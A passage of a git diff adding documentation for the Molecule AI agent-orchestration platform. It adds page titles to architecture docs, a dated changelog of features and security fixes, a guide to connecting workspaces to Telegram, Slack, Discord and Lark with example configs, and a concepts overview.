+Plugin install safeguards:
+
+| Parameter | Default | Purpose |
+|-----------|---------|---------|
+| `PLUGIN_INSTALL_BODY_MAX_BYTES` | 65536 (64 KiB) | Max request body size |
+| `PLUGIN_INSTALL_FETCH_TIMEOUT` | 5m | Whole fetch+copy deadline |
+| `PLUGIN_INSTALL_MAX_DIR_BYTES` | 104857600 (100 MiB) | Max staged-tree size |
+
+---
+
+## CI Pipeline
+
+GitHub Actions runs on push to main and on pull requests:
+
+| Job | What it does |
+|-----|-------------|
+| `platform-build` | Go build, vet, `go test -race` with 25% coverage threshold |
+| `canvas-build` | npm build, vitest run (tests must exist and pass) |
+| `python-lint` | pytest with coverage for workspace-template |
+| `e2e-api` | Spins up Postgres + Redis, runs 62 API tests against locally-built binary |
+| `shellcheck` | Lints all E2E shell scripts |
+| `publish-platform-image` | Builds and pushes to `ghcr.io/molecule-ai/platform` (main only) |
+
+Standalone repos (plugins + templates) use reusable workflows from `Molecule-AI/molecule-ci` for schema validation, secrets scanning, and Docker build smoke tests.
--- a/content/docs/architecture/architecture.md
+++ b/content/docs/architecture/architecture.md
@ -1,3 +1,6 @@
+---
+title: "System Architecture"
+---
 # System Architecture

 ## Overview
--- a/content/docs/architecture/canary-release.md
+++ b/content/docs/architecture/canary-release.md
@ -1,3 +1,6 @@
+---
+title: "Canary release pipeline"
+---
 # Canary release pipeline

 How a workspace-server code change reaches the prod tenant fleet — and how to stop it if something's wrong.
--- a/content/docs/architecture/database-schema.md
+++ b/content/docs/architecture/database-schema.md
@ -1,3 +1,6 @@
+---
+title: "Database Schema"
+---
 # Database Schema

 ## Postgres Tables
--- a/content/docs/architecture/event-log.md
+++ b/content/docs/architecture/event-log.md
@ -1,3 +1,6 @@
+---
+title: "Event Log"
+---
 # Event Log

 Every structural change appends an immutable row to `structure_events`. The table is **append-only** — rows are never updated or deleted. This is the event sourcing pattern.
--- a/content/docs/architecture/memory.md
+++ b/content/docs/architecture/memory.md
@ -1,3 +1,6 @@
+---
+title: "Memory Architecture (HMA)"
+---
 # Memory Architecture (HMA)

 Molecule AI's memory model is built around one principle:
--- a/content/docs/architecture/molecule-technical-doc.md
+++ b/content/docs/architecture/molecule-technical-doc.md
@ -1,3 +1,6 @@
+---
+title: "Molecule AI — Comprehensive Technical Documentation"
+---
 # Molecule AI — Comprehensive Technical Documentation

 > Definitive technical reference for the Molecule AI Agent Team platform.
--- a/content/docs/architecture/overview.md
+++ b/content/docs/architecture/overview.md
@ -1,3 +1,6 @@
+---
+title: "Architecture Overview"
+---
 # Architecture Overview

 Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A protocol, and are visualized on a drag-and-drop canvas.
--- a/content/docs/architecture/partner-api-keys.md
+++ b/content/docs/architecture/partner-api-keys.md
@ -1,3 +1,6 @@
+---
+title: "Partner API Keys — Programmatic Org Management"
+---
 # Partner API Keys — Programmatic Org Management

 > **Status:** Planned
--- a/content/docs/architecture/provisioner.md
+++ b/content/docs/architecture/provisioner.md
@ -1,3 +1,6 @@
+---
+title: "Provisioner"
+---
 # Provisioner

 The provisioner is the platform component that deploys workspace containers and VMs. It is triggered when a workspace is created, imported from a bundle, or expanded into a team.
--- a/content/docs/architecture/saas-prod-migration-2026-04-19.md
+++ b/content/docs/architecture/saas-prod-migration-2026-04-19.md
@ -1,3 +1,6 @@
+---
+title: "SaaS prod migration — 2026-04-19"
+---
 # SaaS prod migration — 2026-04-19

 Promoted staging → main on both `Molecule-AI/molecule-controlplane` and `Molecule-AI/molecule-core`. This note captures the prod cutover deltas so ops can cross-check against the running system.
--- a/content/docs/architecture/staging-environment.md
+++ b/content/docs/architecture/staging-environment.md
@ -1,3 +1,6 @@
+---
+title: "Staging Environment Design"
+---
 # Staging Environment Design

 > **Status:** Planned — gates all future infra changes (Tunnel migration,
--- a/content/docs/architecture/technology-choices.md
+++ b/content/docs/architecture/technology-choices.md
@ -1,3 +1,6 @@
+---
+title: "Technology Choices"
+---
 # Technology Choices

 This document explains why each technology was chosen for Molecule AI.
--- a/content/docs/architecture/tenant-image-upgrades.md
+++ b/content/docs/architecture/tenant-image-upgrades.md
@ -1,3 +1,6 @@
+---
+title: "Tenant Image Upgrade Strategies"
+---
 # Tenant Image Upgrade Strategies

 > **Status:** Option B (sidecar auto-updater) implemented. Options A and C
--- a/content/docs/architecture/wildcard-dns-proxy.md
+++ b/content/docs/architecture/wildcard-dns-proxy.md
@ -1,3 +1,6 @@
+---
+title: "Wildcard DNS + Cloudflare Worker Proxy"
+---
 # Wildcard DNS + Cloudflare Worker Proxy

 > **Status:** Planned — replaces per-tenant DNS record creation.
--- a/content/docs/architecture/workspace-tiers.md
+++ b/content/docs/architecture/workspace-tiers.md
@ -1,3 +1,6 @@
+---
+title: "Workspace Tiers"
+---
 # Workspace Tiers

 Four tiers control the security boundary for each workspace. Higher tiers get more system access but less isolation.
--- a/content/docs/changelog.mdx
+++ b/content/docs/changelog.mdx
@ -0,0 +1,217 @@
+---
+title: Changelog
+description: Customer-facing release notes for Molecule AI — updated daily.
+---
+
+All notable changes to the Molecule AI platform are documented here.
+Entries are published daily at 23:50 UTC.
+
+---
+
+## 2026-04-17
+
+A high-velocity day: 80+ PRs merged across platform, canvas, runtimes, security, and channels.
+
+### ✨ New features
+
+#### opencode Integration — MCP bridge for AI coding agents
+Connect [opencode](https://opencode.ai) to any Molecule AI workspace over a
+standard `Authorization: Bearer` remote MCP connection. opencode gains the full
+A2A tool surface (`delegate_task`, `list_peers`, `recall_memory`, and more)
+via two transports: Streamable HTTP (`POST /workspaces/:id/mcp`) and SSE
+(backwards-compat `GET /workspaces/:id/mcp/stream`). Rate-limited to 120 req/min
+per token. See the [opencode Integration guide](/docs/opencode).
+(#840, #842)
+
+#### Slack — per-agent identity with Bot Token mode
+The Slack channel adapter now supports dual-mode outbound: **Bot Token** (new,
+recommended) and Incoming Webhook (legacy, unchanged). With a `bot_token` each
+workspace posts under its own display name and icon via `chat:write.customize`.
+Markdown is automatically converted to Slack `mrkdwn` format.
+See [Channels](/docs/channels).
+(#844, #851)
+
+#### AG-UI compatible SSE endpoint
+New `GET /workspaces/:id/events` endpoint streams agent events as AG-UI
+compatible Server-Sent Events. Enables AG-UI frontend integrations to subscribe
+to live workspace activity without polling.
+(#601)
+
+#### A2A topology overlay on the canvas
+The canvas now renders a live A2A topology overlay — every workspace as a node,
+every in-flight delegation as an animated directed edge. Zoom to team, click any
+edge to inspect the task payload.
+(#751)
+
+#### Audit trail visualisation panel
+A new audit trail panel in the canvas surfaces the HMAC-SHA256 immutable event
+log per workspace — every task received, LLM call, and completion in
+chronological order with chain-of-custody verification.
+(#651, #759)
+
+#### Workspace hibernation — auto-pause idle workspaces
+Workspaces that receive no tasks for `HIBERNATION_IDLE_MINUTES` (default: 30)
+are automatically hibernated (containers paused, resources freed). They
+auto-wake on the next inbound task with full state restored. Manage via
+`POST /workspaces/:id/hibernate` and `POST /workspaces/:id/wake`.
+See [API Reference](/docs/api-reference).
+(#724)
+
+#### Temporal workflow checkpoints — step-level persistence
+Workspace templates now persist intermediate workflow steps to the database.
+On container restart (crash, deploy, hibernate/wake) the workspace resumes from
+the last completed step rather than restarting the whole task. Step endpoints
+documented in the [API Reference](/docs/api-reference).
+(#797, #803)
+
+#### Semantic memory search
+Agent memory is now vector-indexed via pgvector. `recall_memory` accepts an
+optional `?q=` parameter for semantic (embedding) search in addition to exact
+keyword match. Nearest-neighbour results are ranked by cosine similarity and
+colour-coded in the canvas Memory Inspector.
+(#784, #787)
+
+#### Memory Inspector panel
+A new canvas panel lets you browse, search, and inspect all `LOCAL` and `TEAM`
+memory keys for any workspace — live, without leaving the canvas.
+(#738)
+
+#### Hermes — stacked system messages
+The Hermes runtime now accepts a `system_blocks` list: each block (persona,
+tools, reasoning policy) is merged in order rather than overwriting the previous
+system prompt. Enables persona stacking for complex multi-role workflows.
+See [API Reference](/docs/api-reference) → Runtimes section.
+(#655, #798)
+
+#### Hermes — native `tools` parameter
+Hermes passes tools to the model via the native `tools=[]` API parameter instead
+of text-in-prompt injection. Structured tool definitions, better token efficiency,
+and full compatibility with Nous/Hermes-3 tool call format.
+(#644)
+
+#### Hermes — structured output (`response_format`)
+`response_format=json_schema` is now wired through to the model. Hermes
+workspaces can request strict JSON output against a defined schema.
+(#645)
+
+#### AGENTS.md auto-generation
+Platform workspaces now auto-generate an `AGENTS.md` file in the workspace
+container at boot. The file lists all peer workspaces visible to this workspace,
+their roles, and their capabilities — giving LLMs automatic context about the
+org topology without manual prompt engineering.
+(#763)
+
+#### Discord channel adapter
+A new Discord adapter joins Telegram, Slack, and Lark. Configure with a
+`bot_token` and `channel_id` to send and receive messages on Discord.
+(#656)
+
+#### Per-workspace budget limits
+Set a `budget_limit` (USD) on any workspace. The A2A executor enforces the limit
+at task dispatch — tasks that would exceed the monthly cap are rejected with a
+`429 Budget Exceeded` error. Configure via `PATCH /workspaces/:id`.
+(#611, #606)
+
+#### Per-workspace token metrics
+`GET /workspaces/:id/metrics` returns token counts (input, output, cache read/write)
+aggregated over rolling 1-hour and 30-day windows. Live usage is displayed in the
+canvas WorkspaceUsage panel.
+(#602, #627)
+
+#### Claude Opus 4.7 — effort levels and task budget
+Workspace config now exposes `effort` (`low` / `medium` / `high` / `xhigh` /
+`max`) and `task_budget` (token ceiling) for Anthropic Claude workspaces.
+`xhigh` and `max` activate extended thinking (Opus 4.7+ only). Configure in the
+Canvas Config tab or via `PATCH /workspaces/:id`.
+(#639, #654, #669)
+
+#### Plugin supply-chain hardening
+All plugin refs must now be pinned (no `latest`, no floating branches). Unpinned
+refs are blocked at load time unless `PLUGIN_ALLOW_UNPINNED=true`. SHA-256
+integrity checking available for plugin archives.
+(#775)
+
+#### Org-level plugin governance registry
+A new per-org allowlist controls which plugins workspaces in that org are
+permitted to load. Managed via `POST/DELETE /admin/orgs/:orgId/plugins/allowlist`.
+(#610)
+
+#### Schedule health endpoint
+`GET /admin/schedules/health` returns cross-workspace cron health: last-fired,
+next-scheduled, consecutive-empty count, and phantom detection status for every
+schedule in the org.
+(#671, #796)
+
+#### Fly Machines provisioner
+The platform now supports `PROVISIONER=flyio` — workspaces are provisioned as
+Fly Machines instead of Docker containers or EC2 instances. See the
+[self-hosting guide](/docs/self-hosting).
+(#578 — docs PR #7)
+
+### 🔒 Security
+
+- **Auth hardening** — PATCH `/workspaces/:id` now requires ownership
+  validation; UUID fields are validated before DB queries; input lengths bounded
+  across all handlers. (#692, #701)
+- **Admin token isolation** — `AdminAuth` middleware correctly rejects workspace
+  bearer tokens when `ADMIN_TOKEN` is set, preventing privilege escalation from
+  workspace token → admin. (#684, #729)
+- **Metrics route auth** — `GET /workspaces/:id/metrics` now requires workspace
+  bearer token; previously it was unauthenticated. (#696)
+- **X-Workspace-ID forgery** — Requests spoofing the `system-caller/` prefix in
+  `X-Workspace-ID` headers are rejected. (#766)
+- **GLOBAL memory injection safeguards** — `commit_memory` with `scope: GLOBAL`
+  now validates content for prompt injection patterns before persisting. (#769)
+- **Security headers** — `X-Content-Type-Options: nosniff` and
+  `X-Frame-Options: DENY` added to all API responses. (#629)
+- **Token revocation hardening** — Revoked tokens are purged from the in-memory
+  cache within 60s; previously the cache could serve revoked tokens until TTL
+  expiry. (#696)
+- **MCP server** — npm version pinned; `-y` flag removed from install commands.
+  (SAFE-MCP NEW-003, #808 — docs PR #18)
+- **Canvas test-token endpoint** — gated behind `AdminAuth` and removed from
+  general router. (#612, #708)
+
+### 🔧 Fixes
+
+- Fixed `POST /workspaces` not persisting the secrets envelope on create. (#568)
+- Fixed self-delegation deadlock when a workspace delegates to itself. (#570)
+- Fixed GitHub installation token expiry — tokens now refresh automatically before
+  expiry rather than failing mid-operation. (#567)
+- Fixed `TenantGuard` same-origin bypass for EC2 tenant Canvas. (#584)
+- Fixed pgvector migration to wrap in `DO` block, eliminating E2E CI failures
+  from duplicate extension install. (#843, #670, #636)
+- Fixed scheduler dropping schedules with `NULL next_run_at` permanently. (#728)
+- Fixed `ValidateToken` not checking `removed` workspace status, allowing tokens
+  for deleted workspaces to authenticate. (#719)
+- Fixed canvas hydration error UI, radio keyboard nav, and zoom-to-team
+  shortcut. (#565)
+- Fixed canvas UX: error handling, accessibility, loading state. (#587)
+- Fixed canvas deploy preflight to require env keys for Hermes and Gemini CLI
+  runtimes. (#588)
+- Fixed budget/spend counters capping before DB upsert to prevent NUMERIC
+  overflow. (#630, #634)
+- Fixed pgvector TEXT→UUID FK type mismatch in migrations 028 and 031 that
+  blocked all E2E runs. (#646, #670, #843)
+- Fixed duplicate hook firings (3–4×) in `dedup_settings_hooks`. (#551, #597)
+- Accessibility fixes: keyboard access on `TeamMemberChip`, `role=alert` on
+  status banners, close button label, `ProvisioningTimeout` modal. (#841)
+
+### 📚 Docs
+
+- Google ADK runtime — added hands-on Quickstart section. (docs PR #8)
+- Hermes — full runtime reference page. (docs PR #9)
+- AGENTS.md — auto-generation documented in concepts. (docs PR #10)
+- Semantic memory search — `?q=` param documented in API reference. (docs PR #11)
+- Canvas A2A topology overlay + audit trail panel. (docs PR #12)
+- molecule-medo plugin — opt-in platform plugin page. (docs PR #13)
+- Workspace hibernation — status lifecycle, endpoints, auto-wake behaviour. (docs PR #14)
+- molecule-audit-ledger — HMAC chain, `/audit` endpoint, `LedgerHooks`, CLI. (docs PR #15)
+- Hermes stacked system messages — `system_blocks` kwarg. (docs PR #16)
+- Plugin supply chain security — pinned refs required, SHA-256 integrity. (docs PR #17)
+- SAFE-MCP audit report 2026-04-17. (docs PR #18)
+- Temporal workflow checkpoints — step endpoints, auto-resume behaviour. (docs PR #19)
+
+---
+
+_Changelog entries are compiled by the [Documentation Specialist](https://github.com/Molecule-AI) from all merged pull requests for the day. Times are UTC._
--- a/content/docs/channels.mdx
+++ b/content/docs/channels.mdx
@ -0,0 +1,338 @@
+---
+title: Channels
+description: Connect workspaces to Telegram, Slack, Discord, and Lark/Feishu for social integrations.
+---
+
+## Overview
+
+Channels let workspaces send and receive messages on social platforms. Each
+workspace can have multiple channel integrations — a Telegram bot, a Slack
+webhook, a Discord webhook, a Lark/Feishu Custom Bot — configured independently with per-channel
+allowlists and JSONB config.
+
+Outbound messages flow from the workspace through the platform adapter to the
+social platform. Inbound messages arrive via webhooks (`POST /webhooks/:type`),
+are parsed by the adapter, and forwarded to the workspace as A2A
+`message/send` requests.
+
+```
+User (Telegram/Slack/Discord/Lark) ──webhook──> Platform ──A2A──> Workspace Agent
+                                                     <──adapter──  (response)
+User <──bot message────────────────────────────────────────────────/
+```
+
+---
+
+## Adapters
+
+Four adapters are registered out of the box. Use `GET /channels/adapters` to
+list them at runtime.
+
+### Telegram
+
+Uses the Telegram Bot API. Supports both long-polling (for inbound) and direct
+API calls (for outbound). The adapter caches `BotAPI` instances to avoid
+repeated `getMe` calls.
+
+**Required config fields:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `bot_token` | string | Telegram bot token (`123456789:ABCdef...`). Validated against a strict regex. |
+| `chat_id` | string | Comma-separated chat IDs to listen on and send to. |
+
+**Features:**
+
+- Long-polling with 30s timeout and 2s retry interval
+- Auto-reply to `/start` with the chat ID (useful for setup)
+- Bot commands: `/start`, `/help`, `/reset` (clear history), `/cancel` (best-effort)
+- Long messages automatically split at paragraph/line/word boundaries (4096 char limit)
+- Typing indicator sent while the agent processes
+- Rate-limit handling with `retry_after` backoff
+- Auto-discovers chats via `getUpdates` (including `my_chat_member` events for group adds)
+- Auto-disables the channel when the bot is kicked from a chat
+
+### Slack
+
+Supports two outbound modes — Bot Token (recommended) and Incoming Webhook
+(legacy). Inbound uses the Slack Events API in both modes.
+
+**Config fields:**
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| `bot_token` | string | One of `bot_token` / `webhook_url` | Slack Bot User OAuth Token (`xoxb-…`). Enables per-agent display name and icon via `chat:write.customize`. |
+| `webhook_url` | string | One of `bot_token` / `webhook_url` | Incoming Webhook URL (must start with `https://hooks.slack.com/`). Used as fallback when `bot_token` is absent. |
+| `channel` | string | Required with `bot_token` | Target channel ID or name (e.g. `C01234ABCDE` or `#general`). |
+| `username` | string | Optional | Display name override shown in Slack (Bot Token mode only). |
+| `icon_emoji` | string | Optional | Emoji icon for the agent's avatar (e.g. `:robot_face:`). Bot Token mode only. |
+
+**Features:**
+
+- **Bot Token mode** — per-agent identity: each workspace can post with its own
+  name and icon using `chat.postMessage` + `chat:write.customize`. Markdown is
+  automatically converted to Slack `mrkdwn` format.
+- **Webhook mode** — simple outbound-only integration, no OAuth required.
+- Inbound via Events API JSON payload or slash command (URL-encoded form).
+- `url_verification` challenge handshake supported.
+- Slash commands prepend the command name so the agent sees the full invocation.
+
+**Required Slack app scopes (Bot Token mode):**
+
+`chat:write`, `chat:write.customize`, `channels:history`, `app_mentions:read`
+
+### Discord
+
+Uses Discord Incoming Webhooks for outbound and Discord Interactions (slash commands) for inbound. Discord uses a push-based interactions model — there is no long-polling; the platform receives signed payloads at the interactions endpoint.
+
+**Required config fields:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `webhook_url` | string | Discord Incoming Webhook URL. Must start with `https://discord.com/api/webhooks/`. Validated on creation (matches the Slack SSRF-guard pattern). |
+
+**Global secret:**
+
+```bash
+# Register the webhook URL as a global or per-workspace secret
+curl -X PUT http://localhost:8080/settings/secrets \
+  -H 'Content-Type: application/json' \
+  -d '{"key":"DISCORD_WEBHOOK_URL","value":"https://discord.com/api/webhooks/..."}'
+```
+
+**Features:**
+
+- Outbound via Incoming Webhook — POSTs `{"content": "<text>"}` to the webhook URL
+- Long messages automatically split at newline/space boundaries (Discord 2000-character hard limit)
+- Inbound via Discord Interactions — no long-polling; Discord pushes signed payloads
+  - **Type 1 PING** — router layer responds `{"type":1}`; adapter returns `nil` (no A2A forward)
+  - **Type 2 APPLICATION\_COMMAND** — slash command, forwarded as `/commandname option1 option2`
+  - **Type 3 MESSAGE\_COMPONENT** — button/select interaction, forwarded as component data
+- User identity prefers `member.user` (guild) over `user` (DM) for consistent routing
+- `StartPolling` is a no-op (returns nil) — Discord uses interactions, not polling
+
+**Setup:**
+
+1. **Incoming Webhook** — Discord Server → channel settings → Integrations → Webhooks → New Webhook → Copy Webhook URL
+2. Add as a secret: `PUT /settings/secrets` with `DISCORD_WEBHOOK_URL`
+3. **Slash commands (inbound)** — create a Discord Application at [discord.com/developers](https://discord.com/developers/applications), set the **Interactions Endpoint URL** to `https://<platform-host>/webhooks/discord`
+4. Verify the endpoint: Discord sends a type-1 PING; the platform responds `{"type":1}` automatically
+
+**Example config:**
+
+```json
+{
+  "type": "discord",
+  "config": {
+    "webhook_url": "https://discord.com/api/webhooks/1234567890/abcdef..."
+  }
+}
+```
+
+<Callout type="info">
+  Discord does not support bot-initiated long-polling. Inbound messages only work via slash commands registered in your Discord Application. If you only need outbound (workspace → Discord), no Application setup is required — just add the webhook URL.
+</Callout>
+
+---
+
+### Lark / Feishu
+
+Outbound via Custom Bot webhooks, inbound via Event Subscriptions.
+
+**Required config fields:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `webhook_url` | string | Custom Bot webhook URL. Must start with `https://open.feishu.cn/open-apis/bot/v2/hook/` or `https://open.larksuite.com/open-apis/bot/v2/hook/`. |
+
+**Optional config fields:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `verify_token` | string | Verification Token from the app's Event Subscriptions page. When set, inbound events with a mismatching token are rejected. |
+
+**Features:**
+
+- Both China (`open.feishu.cn`) and international (`open.larksuite.com`) endpoints supported
+- `url_verification` handshake with constant-time `verify_token` comparison
+- v2 event payload parsing (`im.message.receive_v1`)
+- Token verification on both `url_verification` and `event_callback` payloads
+- Application-level error codes checked (Lark returns HTTP 200 even for app errors)
+
+---
+
+## Setup Flow
+
+### 1. Create a Channel
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/channels \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{
+    "type": "telegram",
+    "config": {
+      "bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz",
+      "chat_id": "-1001234567890"
+    }
+  }'
+```
+
+### 2. Test the Connection
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/test \
+  -H "Authorization: Bearer {token}"
+```
+
+### 3. Send a Message
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/send \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{"text": "Hello from the agent!"}'
+```
+
+---
+
+## Inbound Webhooks
+
+Register your platform's public URL as the webhook endpoint for each social
+platform. Inbound messages arrive at:
+
+```
+POST /webhooks/:type
+```
+
+where `:type` is `telegram`, `slack`, `discord`, or `lark`. The platform:
+
+1. Looks up all channels of that type
+2. Calls the adapter's `ParseWebhook` to extract a standardized `InboundMessage`
+3. Checks the allowlist (if configured)
+4. Forwards the message to the workspace via A2A `message/send`
+
+For Telegram, the platform can also use long-polling instead of webhooks,
+started automatically when a Telegram channel is created.
+
+For Discord, the platform automatically handles type-1 PING interactions (required by Discord for endpoint verification) and forwards type-2 and type-3 interaction payloads to the workspace.
+
+---
+
+## Discover Chats
+
+Auto-detect available chats for a bot token before creating a channel:
+
+```bash
+curl -X POST http://localhost:8080/channels/discover \
+  -H "Content-Type: application/json" \
+  -d '{"type": "telegram", "bot_token": "123456789:ABCdef..."}'
+```
+
+Returns the bot username, discovered chats (with IDs, names, and types), and
+whether the bot can read all group messages (Telegram privacy mode).
+
+---
+
+## Allowlists
+
+Each channel row has an `allowed_users` JSONB array. When non-empty, only
+messages from users whose IDs appear in the list are forwarded to the workspace.
+All others are silently dropped.
+
+---
+
+## Config Encryption
+
+Sensitive config fields (like `bot_token`) are encrypted at rest. The `List`
+endpoint decrypts them server-side and masks tokens in the response
+(showing only the first 4 and last 4 characters).
+
+---
+
+## API Reference
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/channels/adapters` | List available adapter types |
+| POST | `/channels/discover` | Auto-detect chats for a bot token |
+| GET | `/workspaces/:id/channels` | List channels for a workspace |
+| POST | `/workspaces/:id/channels` | Add a channel |
+| PATCH | `/workspaces/:id/channels/:channelId` | Update a channel |
+| DELETE | `/workspaces/:id/channels/:channelId` | Remove a channel |
+| POST | `/workspaces/:id/channels/:channelId/test` | Test connection |
+| POST | `/workspaces/:id/channels/:channelId/send` | Send outbound message |
+| POST | `/webhooks/:type` | Incoming social webhook |
+
+---
+
+## Example Configs
+
+### Telegram
+
+```json
+{
+  "type": "telegram",
+  "config": {
+    "bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
+    "chat_id": "-1001234567890"
+  }
+}
+```
+
+Multiple chats (comma-separated):
+
+```json
+{
+  "type": "telegram",
+  "config": {
+    "bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
+    "chat_id": "-1001234567890, -1009876543210"
+  }
+}
+```
+
+### Slack
+
+```json
+{
+  "type": "slack",
+  "config": {
+    "webhook_url": "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
+  }
+}
+```
+
+### Discord
+
+```json
+{
+  "type": "discord",
+  "config": {
+    "webhook_url": "https://discord.com/api/webhooks/1234567890123456789/abcdefGHIjklmnopQRSTuvwxyz_1234"
+  }
+}
+```
+
+### Lark / Feishu
+
+```json
+{
+  "type": "lark",
+  "config": {
+    "webhook_url": "https://open.larksuite.com/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+    "verify_token": "your-verification-token"
+  }
+}
+```
+
+China endpoint:
+
+```json
+{
+  "type": "lark",
+  "config": {
+    "webhook_url": "https://open.feishu.cn/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
+  }
+}
+```
--- a/content/docs/concepts.mdx
+++ b/content/docs/concepts.mdx
@ -0,0 +1,216 @@
+---
+title: Concepts
+description: The core primitives that compose every Molecule AI org — workspaces, plugins, channels, schedules, tokens, external agents, and the canvas.
+---
+
+## Workspaces
+
+A **workspace** is a real Docker container running a real LLM agent. Each
+workspace has:
+
+- A **role** (a one-line job description fed into its system prompt — also
+  written to `/workspace/AGENTS.md` so peers can discover it)
+- An **initial prompt** (run once at first boot — typically clone repo,
+  read docs, memorise context)
+- A **runtime** (`claude-code`, `langgraph`, `crewai`, `autogen`, `deepagents`,
+  `openclaw`, `hermes`, `gemini-cli`, [`google-adk`](/docs/google-adk))
+- A **tier** (resource budget — T1 sandboxed, T2 standard, T3 privileged, T4 full-host)
+- An optional **parent** (forms the org tree)
+- An optional **workspace_dir** (a host path bind-mounted into the
+  container — gives the agent direct access to your codebase)
+- An optional **budget_limit** (workspace-level spend cap — see [Workspace budgets](#workspace-budgets) below)
+
+Workspaces talk to each other via **A2A** (agent-to-agent) messages, routed
+by the platform. Communication rules: same workspace, siblings, and
+parent/child are allowed; everything else is denied.
+
+See the [API Reference](/docs/api-reference#budget) for the full endpoint specification.
+
+### Workspace status lifecycle
+
+| Status | Meaning | Resumes via |
+|--------|---------|-------------|
+| `provisioning` | Container being started | automatic |
+| `online` | Running and accepting tasks | — |
+| `degraded` | Heartbeat `error_rate > 0.5` | auto-recovers |
+| `offline` | Missed heartbeats (liveness sweep) | auto-restart |
+| `paused` | Manually stopped via `/pause` | `POST /resume` |
+| `hibernated` | Auto-paused after idle timeout (or via `/hibernate`) | automatic on next A2A message |
+| `removed` | Deleted | — |
+
+**Hibernation** is an opt-in automatic cost-saving mode. Set `hibernation_idle_minutes` in the workspace's `config.yaml` to enable it. When a hibernated workspace receives an A2A message, the platform wakes it automatically (returning `503 Retry-After: 15` while it comes online). See [API Reference — Lifecycle](/docs/api-reference#lifecycle) for the `/hibernate` endpoint and configuration details.
+
+## External agents
+
+An **external agent** is a workspace with `runtime: external` — it runs on
+your own infrastructure instead of the platform's Docker network. External
+agents:
+
+- Register via `POST /registry/register` and receive a bearer token
+- Send heartbeats every 30 seconds to stay online
+- Accept A2A messages at their registered URL
+- Appear on the canvas with a purple **REMOTE** badge
+- Skip Docker health sweep (liveness is heartbeat-only)
+
+See [External Agents](/docs/external-agents) for the full registration guide.
+
+## Plugins
+
+A **plugin** is a bundle of capabilities a workspace can install:
+
+- **Hooks** — `PreToolUse`, `PostToolUse`, `UserPromptSubmit` — for
+  guardrails, audit trails, dangerous-command refusal
+- **Skills** — multi-criteria code review, cross-vendor adversarial
+  review, LLM-as-judge gates
+- **Slash commands** — `/triage`, `/retro`, etc.
+- **MCP servers** — bring in tools the model can call
+
+Plugins have two axes: **source** (where to fetch — `local://`, `github://`)
+and **shape** (what's inside — agentskills.io format, MCP server, etc.).
+
+Plugins compose. Per-workspace plugin lists **UNION** with the org-wide
+defaults — adding one capability to one role doesn't require re-listing
+every default. Use `!plugin-name` to opt a specific default out.
+
+See [Plugins](/docs/plugins) for the full guide.
+
+## Channels
+
+A **channel** wires a workspace to an external messaging platform:
+
+| Adapter | Platform | Config |
+|---------|----------|--------|
+| `telegram` | Telegram | Bot token + chat_id allowlist |
+| `slack` | Slack | Workspace token + channel |
+| `lark` | Lark / Feishu | Custom Bot webhook + Event Subscriptions |
+
+Once connected, users can talk to agents from outside the canvas — and
+agents can broadcast back. Inbound messages arrive via webhook and are
+routed to the workspace as A2A messages.
+
+See [Channels](/docs/channels) for setup instructions.
+
+## Schedules
+
+A **schedule** is a cron-driven recurring prompt. Each tick fires an A2A
+message into the workspace, which the agent treats as a new task. Schedules
+are supervised — panics in the dispatch path are recovered with exponential
+backoff, and a liveness watchdog surfaces stuck subsystems via
+`/admin/liveness`.
+
+Schedules let you build the *evolution* loop: hourly security audits,
+daily ecosystem watches, weekly plugin curation, etc.
+
+See [Schedules](/docs/schedules) for the full guide.
+
+## Tokens
+
+**Bearer tokens** authenticate agents and API clients. Each token is
+scoped to a single workspace — a token from workspace A cannot access
+workspace B.
+
+- Issued on first registration (`POST /registry/register`)
+- Create/list/revoke via `GET/POST/DELETE /workspaces/:id/tokens`
+- 256-bit entropy, sha256-hashed in DB, plaintext shown once
+
+See [Token Management](/docs/tokens) for the full guide.
+
+## The canvas
+
+The **canvas** is a Next.js 15 React Flow visualisation of your org.
+Every workspace is a node. Every A2A message is an edge. Every memory
+write, every scheduled fire, every status change pushes a WebSocket
+event in real time.
+
+The canvas isn't just a viewer — it's the operator surface. Drag nodes
+to reorganise teams, click to chat, right-click for actions, watch the
+team work in real time.
+
+### A2A Topology Overlay
+
+The canvas renders **live delegation edges** on top of the workspace graph.
+When one agent delegates to another, a directed edge appears:
+
+- **Animated violet** — delegation occurred within the last 5 minutes
+- **Static blue** — delegation occurred earlier
+
+The overlay polls `GET /workspaces/:id/activity?type=delegation` for every
+visible node every 60 seconds. Toggle it on/off with the **A2A** button in
+the toolbar (⊞ mesh icon) — the setting persists across page loads.
+
+### Audit Trail Panel
+
+Every workspace's **Side Panel → Audit** tab (⊟ ledger icon) shows the
+workspace's tamper-evident audit ledger via `GET /workspaces/:id/audit`.
+Each entry records what happened (event type, actor, outcome) and whether
+its hash chain is intact.
+
+| Event type | Colour | Meaning |
+|-----------|--------|---------|
+| `delegation` | Blue | An A2A delegation was made or received |
+| `decision` | Violet | A gate or approval decision was recorded |
+| `gate` | Yellow | A HITL or automated gate was evaluated |
+| `hitl` | Orange | A human-in-the-loop approval request |
+
+Entries with `chain_valid: false` display a red ⚠ tamper indicator —
+investigate immediately; the audit chain may have been modified offline.
+
+Use the event-type filter bar at the top of the panel to narrow results.
+Click **Load more** to paginate (cursor-based, 50 entries per page).
+
+### Memory Inspector panel
+
